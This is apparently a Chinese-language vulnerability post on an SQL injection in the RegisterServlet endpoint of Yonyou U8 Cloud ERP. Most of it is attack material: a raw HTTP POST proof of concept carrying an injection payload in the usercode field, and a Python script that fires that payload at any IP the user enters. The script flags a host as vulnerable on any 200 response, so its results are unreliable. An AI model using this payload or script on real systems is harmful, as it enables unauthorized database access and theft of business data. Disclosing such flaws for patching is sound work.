用友u8-cloud RegisterServlet SQL注入

声明
本文仅用于技术交流，请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。

一、产品介绍

U8 Cloud是用友公司推出的企业上云数字化平台，为成长型和创新型企业提供全面的云ERP解决方案。

二、漏洞概述

该平台中存在一个安全漏洞，涉及RegisterServlet接口对用户输入参数缺乏有效过滤，可能导致SQL注入攻击。攻击者可通过此漏洞未经授权地访问数据库，造成潜在的信息泄露风险。建议尽快修复漏洞，强化输入验证，提升系统安全性。

三、漏洞复现

poc 

POST /servlet/RegisterServlet HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

 四、检测脚本

import requests

def verify(ip):

    url = f'{ip}/servlet/RegisterServlet'

    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36',
        'Connection': 'close',
        'Content-Length': '85',
        'Accept': '*/*',
        'Accept-Language': 'en',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept-Encoding': 'gzip',
    }

    payload = '''usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--'''


    try:
        response = requests.post(url, headers=headers, data=payload,verify=False)
        # 验证成功输出相关信息
        if response.status_code == 200 :
            print(f"{ip}存在用友u8-cloud RegisterServlet SQL注入漏洞！！！")

    except Exception as e:
        pass


if __name__ == '__main__':
    self = input('请输入目标主机IP地址：')
    verify(self)